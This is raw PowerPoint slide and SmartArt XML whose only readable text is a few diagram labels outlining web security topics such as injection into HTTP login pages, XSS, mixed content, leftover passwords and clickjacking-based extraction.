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7"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId38"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="270" r:id="rId5"/>
    <p:sldId id="276" r:id="rId6"/>
    <p:sldId id="277" r:id="rId7"/>
    <p:sldId id="290" r:id="rId8"/>
    <p:sldId id="273" r:id="rId9"/>
    <p:sldId id="283" r:id="rId10"/>
    <p:sldId id="278" r:id="rId11"/>
    <p:sldId id="291" r:id="rId12"/>
    <p:sldId id="272" r:id="rId13"/>
    <p:sldId id="279" r:id="rId14"/>
    <p:sldId id="296" r:id="rId15"/>
    <p:sldId id="294" r:id="rId16"/>
    <p:sldId id="284" r:id="rId17"/>
    <p:sldId id="285" r:id="rId18"/>
    <p:sldId id="271" r:id="rId19"/>
    <p:sldId id="280" r:id="rId20"/>
    <p:sldId id="286" r:id="rId21"/>
    <p:sldId id="287" r:id="rId22"/>
    <p:sldId id="297" r:id="rId23"/>
    <p:sldId id="298" r:id="rId24"/>
    <p:sldId id="303" r:id="rId25"/>
    <p:sldId id="275" r:id="rId26"/>
    <p:sldId id="304" r:id="rId27"/>
    <p:sldId id="289" r:id="rId28"/>
    <p:sldId id="281" r:id="rId29"/>
    <p:sldId id="293" r:id="rId30"/>
    <p:sldId id="302" r:id="rId31"/>
    <p:sldId id="292" r:id="rId32"/>
    <p:sldId id="299" r:id="rId33"/>
    <p:sldId id="305" r:id="rId34"/>
    <p:sldId id="288" r:id="rId35"/>
    <p:sldId id="29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261" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="57" d="100"/>
          <a:sy n="57" d="100"/>
        </p:scale>
        <p:origin x="126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7" d="100"/>
          <a:sy n="47" d="100"/>
        </p:scale>
        <p:origin x="30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8D3BC9-5D35-44A0-B4C2-B84A06DBF365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6F9EFF4C-BBB4-4A40-8A27-C676A9B14600}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
            <a:t>Automatic</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{729E539D-D96F-4148-B657-D05F21DAB75A}" type="parTrans" cxnId="{40C3205E-1065-4619-9427-F49F5217F8BB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B5720949-39E9-47A8-A37F-FE7FABD12E3B}" type="sibTrans" cxnId="{40C3205E-1065-4619-9427-F49F5217F8BB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{889AA443-D869-4BEF-B479-1430D8E39D0F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
            <a:t>Manual</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{086F0CDE-6C74-4801-99D4-38A535D170DD}" type="parTrans" cxnId="{3919E151-8BF0-44C4-96C1-61EE7DFCDC78}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4475BED3-5B73-4883-9624-D11614128B01}" type="sibTrans" cxnId="{3919E151-8BF0-44C4-96C1-61EE7DFCDC78}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{14E872C7-041C-4564-94D7-3DA4A0A56EE7}" type="pres">
      <dgm:prSet presAssocID="{178D3BC9-5D35-44A0-B4C2-B84A06DBF365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44A402B0-A341-4D51-83A0-4C952DA9C8DB}" type="pres">
      <dgm:prSet presAssocID="{178D3BC9-5D35-44A0-B4C2-B84A06DBF365}" presName="divider" presStyleLbl="fgShp" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3588C8E6-DBF6-4141-BAAD-1412374959C0}" type="pres">
      <dgm:prSet presAssocID="{6F9EFF4C-BBB4-4A40-8A27-C676A9B14600}" presName="downArrow" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{09458632-1684-4865-AD3D-A449BB62CC29}" type="pres">
      <dgm:prSet presAssocID="{6F9EFF4C-BBB4-4A40-8A27-C676A9B14600}" presName="downArrow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C92B480-D074-4B5E-A67C-8005E5DDE9ED}" type="pres">
      <dgm:prSet presAssocID="{889AA443-D869-4BEF-B479-1430D8E39D0F}" presName="upArrow" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0AECE779-D119-4CE7-81B0-FE06D5AA570E}" type="pres">
      <dgm:prSet presAssocID="{889AA443-D869-4BEF-B479-1430D8E39D0F}" presName="upArrow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F10D533B-35EE-46D0-83EB-56575E6FA68F}" type="presOf" srcId="{178D3BC9-5D35-44A0-B4C2-B84A06DBF365}" destId="{14E872C7-041C-4564-94D7-3DA4A0A56EE7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow3"/>
    <dgm:cxn modelId="{3919E151-8BF0-44C4-96C1-61EE7DFCDC78}" srcId="{178D3BC9-5D35-44A0-B4C2-B84A06DBF365}" destId="{889AA443-D869-4BEF-B479-1430D8E39D0F}" srcOrd="1" destOrd="0" parTransId="{086F0CDE-6C74-4801-99D4-38A535D170DD}" sibTransId="{4475BED3-5B73-4883-9624-D11614128B01}"/>
    <dgm:cxn modelId="{3D688474-543B-449E-8E15-ACCD4E61B33E}" type="presOf" srcId="{889AA443-D869-4BEF-B479-1430D8E39D0F}" destId="{0AECE779-D119-4CE7-81B0-FE06D5AA570E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow3"/>
    <dgm:cxn modelId="{ED92A2F7-B3D5-4932-87BD-05990887F1D8}" type="presOf" srcId="{6F9EFF4C-BBB4-4A40-8A27-C676A9B14600}" destId="{09458632-1684-4865-AD3D-A449BB62CC29}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow3"/>
    <dgm:cxn modelId="{40C3205E-1065-4619-9427-F49F5217F8BB}" srcId="{178D3BC9-5D35-44A0-B4C2-B84A06DBF365}" destId="{6F9EFF4C-BBB4-4A40-8A27-C676A9B14600}" srcOrd="0" destOrd="0" parTransId="{729E539D-D96F-4148-B657-D05F21DAB75A}" sibTransId="{B5720949-39E9-47A8-A37F-FE7FABD12E3B}"/>
    <dgm:cxn modelId="{37EE0722-0628-4909-955D-B9895B0D447A}" type="presParOf" srcId="{14E872C7-041C-4564-94D7-3DA4A0A56EE7}" destId="{44A402B0-A341-4D51-83A0-4C952DA9C8DB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow3"/>
    <dgm:cxn modelId="{CF665199-C2D2-4F16-9D7F-3397A90F5A92}" type="presParOf" srcId="{14E872C7-041C-4564-94D7-3DA4A0A56EE7}" destId="{3588C8E6-DBF6-4141-BAAD-1412374959C0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow3"/>
    <dgm:cxn modelId="{32F5644E-5027-4D07-A967-BE543221BD0B}" type="presParOf" srcId="{14E872C7-041C-4564-94D7-3DA4A0A56EE7}" destId="{09458632-1684-4865-AD3D-A449BB62CC29}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow3"/>
    <dgm:cxn modelId="{2FA0C357-1D88-4682-99F8-4D1F083E028E}" type="presParOf" srcId="{14E872C7-041C-4564-94D7-3DA4A0A56EE7}" destId="{CC92B480-D074-4B5E-A67C-8005E5DDE9ED}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/arrow3"/>
    <dgm:cxn modelId="{DC9FE744-8346-42E4-992B-2FA8C9B0603A}" type="presParOf" srcId="{14E872C7-041C-4564-94D7-3DA4A0A56EE7}" destId="{0AECE779-D119-4CE7-81B0-FE06D5AA570E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887610-6404-4181-9F25-B4178E02923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FF707E3A-C2A7-4C7B-BA00-8120B6811B08}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
            <a:t>Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A324E3AC-6C43-4FB5-9C0F-C6E50F1159B9}" type="parTrans" cxnId="{D169A9CB-AA93-4B87-9FDE-1FB9DE7E3FE2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{27006414-00CF-44D9-A846-7D97F43D464B}" type="sibTrans" cxnId="{D169A9CB-AA93-4B87-9FDE-1FB9DE7E3FE2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{47F4A159-F8C5-467A-8A70-44123CD33D5F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
            <a:t>HTTP login pages</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9A67D28D-0CC8-475B-8C08-298741656D65}" type="parTrans" cxnId="{BE92498D-FF38-4B29-8433-90D2E025950F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{092FB642-9678-4E19-B7C5-EF8BB3407B8C}" type="sibTrans" cxnId="{BE92498D-FF38-4B29-8433-90D2E025950F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{429513C3-08D3-4440-900C-05F7655331C0}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
            <a:t>Extraction</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3DB798A-343D-42EB-8B2A-F3705075E054}" type="parTrans" cxnId="{7A0087EA-E15F-468C-8E07-9CB4E8145AF8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2CD6E947-0D04-4971-8FAF-8A613F03A719}" type="sibTrans" cxnId="{7A0087EA-E15F-468C-8E07-9CB4E8145AF8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE4C19AE-553A-4DDF-A96D-D3ABFB9EF6A6}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
            <a:t>Stealth Methods</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F343EEFC-0A29-48BB-94AD-B99E8B1709D2}" type="parTrans" cxnId="{31EA229E-EDCA-4C9F-B4D0-CA4F05A3CDF4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87CF13BB-AA48-4E2D-BAB1-25852C29447B}" type="sibTrans" cxnId="{31EA229E-EDCA-4C9F-B4D0-CA4F05A3CDF4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{219A1762-EBD8-4502-8228-1DB1932F5D83}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
            <a:t>Embedded devices</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FBE1A18F-CA8D-4D95-B05C-F7355676B06F}" type="parTrans" cxnId="{8F083AE9-6AEC-4BE2-9F7E-9FC2F636BB91}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1083E68F-79E1-4A94-8B15-6D0193DBB30C}" type="sibTrans" cxnId="{8F083AE9-6AEC-4BE2-9F7E-9FC2F636BB91}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{474702C0-7386-4ADC-A238-1E752F0ACBAA}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
            <a:t>Broken HTTPS</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35365F37-BE15-46D9-A801-B3028309F122}" type="parTrans" cxnId="{E6EF2460-38C4-453B-A312-777D4EB4165D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{28A04E63-9907-4EEF-921F-ED3380033077}" type="sibTrans" cxnId="{E6EF2460-38C4-453B-A312-777D4EB4165D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{53D8BD2B-6706-4187-8082-1CBEFE3BC631}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
            <a:t>Active Mixed Content</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33761BEE-1A10-423F-989A-5C7C7EC79227}" type="parTrans" cxnId="{5ED1E95D-3FDA-4A56-A753-68867891A10F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5F842B92-0B1B-40D1-8C4E-7BB5636C65B4}" type="sibTrans" cxnId="{5ED1E95D-3FDA-4A56-A753-68867891A10F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3A12F5BB-AD83-49A5-96EC-FA304DB2520A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
            <a:t>XSS</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C5DA4A1D-6703-4B68-94B5-02B7347CAC23}" type="parTrans" cxnId="{DB2B8531-B8B8-47C2-BD92-EA9249F91D9D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33FC048D-3E50-4EB6-9C41-23167ED6B0E0}" type="sibTrans" cxnId="{DB2B8531-B8B8-47C2-BD92-EA9249F91D9D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6AC47D2C-5045-4AD1-8960-67B284A3830B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
            <a:t>Leftover passwords</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{57967760-F36A-4FFE-A78D-39649EE1EB1E}" type="parTrans" cxnId="{9F8971F7-3AA1-434A-B4C0-4C6D52C4B904}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E8B62B5C-118D-4EA7-8437-C5E7D7B6AE07}" type="sibTrans" cxnId="{9F8971F7-3AA1-434A-B4C0-4C6D52C4B904}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C4C09287-B065-49A3-A939-A8E4AB6AAA7D}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
            <a:t>Form Action</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{966EA029-80D0-480B-A527-61533E93B871}" type="parTrans" cxnId="{A3764259-42EB-4069-88A1-72E3F8F936D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{783B0DC4-91BF-40F3-9A09-6FBBC417B9C1}" type="sibTrans" cxnId="{A3764259-42EB-4069-88A1-72E3F8F936D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7CCD730A-3C50-4019-910B-86460C0A55E5}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-CA" dirty="0" smtClean="0"/>
            <a:t>Clickjacking</a:t>
          </a:r>
          <a:endParaRPr lang="en-CA" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{04BB6B82-5EAF-468C-AF0C-E8BDDD1D8452}" type="parTrans" cxnId="{F1303EAA-AE73-4C52-B180-8229F501BB9F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0E9A0E99-1505-4B3C-87F8-853CDE2F7AD0}" type="sibTrans" cxnId="{F1303EAA-AE73-4C52-B180-8229F501BB9F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-CA"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{210D3F07-5AC0-480E-AD4C-0E694EAD317C}" type="pres">
      <dgm:prSet presAssocID="{C1887610-6404-4181-9F25-B4178E02923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CC7BA566-C681-4AD4-80FF-C959A93B6FC1}" type="pres">
      <dgm:prSet presAssocID="{FF707E3A-C2A7-4C7B-BA00-8120B6811B08}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2" custLinFactNeighborY="-161">
        <dgm:presLayoutVars>
          <dgm:chMax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0CED1313-3C12-4870-8C94-4D37488DFCF5}" type="pres">
      <dgm:prSet presAssocID="{FF707E3A-C2A7-4C7B-BA00-8120B6811B08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96D52DD-CE0B-49F9-8B8E-F843E53E84F3}" type="pres">
      <dgm:prSet presAssocID="{429513C3-08D3-4440-900C-05F7655331C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082CA9F6-4543-4608-A905-0593956F3964}" type="pres">
      <dgm:prSet presAssocID="{429513C3-08D3-4440-900C-05F7655331C0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8C4D3680-755F-4F08-9226-7CAF9540E27C}" type="presOf" srcId="{FE4C19AE-553A-4DDF-A96D-D3ABFB9EF6A6}" destId="{082CA9F6-4543-4608-A905-0593956F3964}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{5ED1E95D-3FDA-4A56-A753-68867891A10F}" srcId="{FF707E3A-C2A7-4C7B-BA00-8120B6811B08}" destId="{53D8BD2B-6706-4187-8082-1CBEFE3BC631}" srcOrd="3" destOrd="0" parTransId="{33761BEE-1A10-423F-989A-5C7C7EC79227}" sibTransId="{5F842B92-0B1B-40D1-8C4E-7BB5636C65B4}"/>
    <dgm:cxn modelId="{31EA229E-EDCA-4C9F-B4D0-CA4F05A3CDF4}" srcId="{429513C3-08D3-4440-900C-05F7655331C0}" destId="{FE4C19AE-553A-4DDF-A96D-D3ABFB9EF6A6}" srcOrd="0" destOrd="0" parTransId="{F343EEFC-0A29-48BB-94AD-B99E8B1709D2}" sibTransId="{87CF13BB-AA48-4E2D-BAB1-25852C29447B}"/>
    <dgm:cxn modelId="{ABB568EB-160A-491F-84C9-E1BFE43996CF}" type="presOf" srcId="{C1887610-6404-4181-9F25-B4178E02923A}" destId="{210D3F07-5AC0-480E-AD4C-0E694EAD317C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{9F266008-1B6A-4DBA-84CF-080BF8C86C85}" type="presOf" srcId="{3A12F5BB-AD83-49A5-96EC-FA304DB2520A}" destId="{0CED1313-3C12-4870-8C94-4D37488DFCF5}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{BE92498D-FF38-4B29-8433-90D2E025950F}" srcId="{FF707E3A-C2A7-4C7B-BA00-8120B6811B08}" destId="{47F4A159-F8C5-467A-8A70-44123CD33D5F}" srcOrd="0" destOrd="0" parTransId="{9A67D28D-0CC8-475B-8C08-298741656D65}" sibTransId="{092FB642-9678-4E19-B7C5-EF8BB3407B8C}"/>
    <dgm:cxn modelId="{4BBB8750-9D73-460F-9305-EC5706AD5719}" type="presOf" srcId="{474702C0-7386-4ADC-A238-1E752F0ACBAA}" destId="{0CED1313-3C12-4870-8C94-4D37488DFCF5}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8CEE74A5-F134-47AA-B1D6-C02F40BEBB6E}" type="presOf" srcId="{429513C3-08D3-4440-900C-05F7655331C0}" destId="{396D52DD-CE0B-49F9-8B8E-F843E53E84F3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{5A3DF606-F9F1-43C0-9F83-EE68AC0F5ED9}" type="presOf" srcId="{FF707E3A-C2A7-4C7B-BA00-8120B6811B08}" destId="{CC7BA566-C681-4AD4-80FF-C959A93B6FC1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D169A9CB-AA93-4B87-9FDE-1FB9DE7E3FE2}" srcId="{C1887610-6404-4181-9F25-B4178E02923A}" destId="{FF707E3A-C2A7-4C7B-BA00-8120B6811B08}" srcOrd="0" destOrd="0" parTransId="{A324E3AC-6C43-4FB5-9C0F-C6E50F1159B9}" sibTransId="{27006414-00CF-44D9-A846-7D97F43D464B}"/>
    <dgm:cxn modelId="{8F083AE9-6AEC-4BE2-9F7E-9FC2F636BB91}" srcId="{FF707E3A-C2A7-4C7B-BA00-8120B6811B08}" destId="{219A1762-EBD8-4502-8228-1DB1932F5D83}" srcOrd="1" destOrd="0" parTransId="{FBE1A18F-CA8D-4D95-B05C-F7355676B06F}" sibTransId="{1083E68F-79E1-4A94-8B15-6D0193DBB30C}"/>
    <dgm:cxn modelId="{72436465-77C2-4B65-AF7C-D6F983097AB6}" type="presOf" srcId="{219A1762-EBD8-4502-8228-1DB1932F5D83}" destId="{0CED1313-3C12-4870-8C94-4D37488DFCF5}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{4D26D257-2F3C-47F9-8BD3-0A54820250DA}" type="presOf" srcId="{C4C09287-B065-49A3-A939-A8E4AB6AAA7D}" destId="{082CA9F6-4543-4608-A905-0593956F3964}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D80A43C0-6525-4C13-94DF-6BEC7E4AF7DB}" type="presOf" srcId="{6AC47D2C-5045-4AD1-8960-67B284A3830B}" destId="{0CED1313-3C12-4870-8C94-4D37488DFCF5}" srcOrd="0" destOrd="5" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{49A57F1E-84ED-4C4B-8175-2E358834DEA7}" type="presOf" srcId="{7CCD730A-3C50-4019-910B-86460C0A55E5}" destId="{082CA9F6-4543-4608-A905-0593956F3964}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E6EF2460-38C4-453B-A312-777D4EB4165D}" srcId="{FF707E3A-C2A7-4C7B-BA00-8120B6811B08}" destId="{474702C0-7386-4ADC-A238-1E752F0ACBAA}" srcOrd="2" destOrd="0" parTransId="{35365F37-BE15-46D9-A801-B3028309F122}" sibTransId="{28A04E63-9907-4EEF-921F-ED3380033077}"/>
    <dgm:cxn modelId="{F1303EAA-AE73-4C52-B180-8229F501BB9F}" srcId="{429513C3-08D3-4440-900C-05F7655331C0}" destId="{7CCD730A-3C50-4019-910B-86460C0A55E5}" srcOrd="2" destOrd="0" parTransId="{04BB6B82-5EAF-468C-AF0C-E8BDDD1D8452}" sibTransId="{0E9A0E99-1505-4B3C-87F8-853CDE2F7AD0}"/>
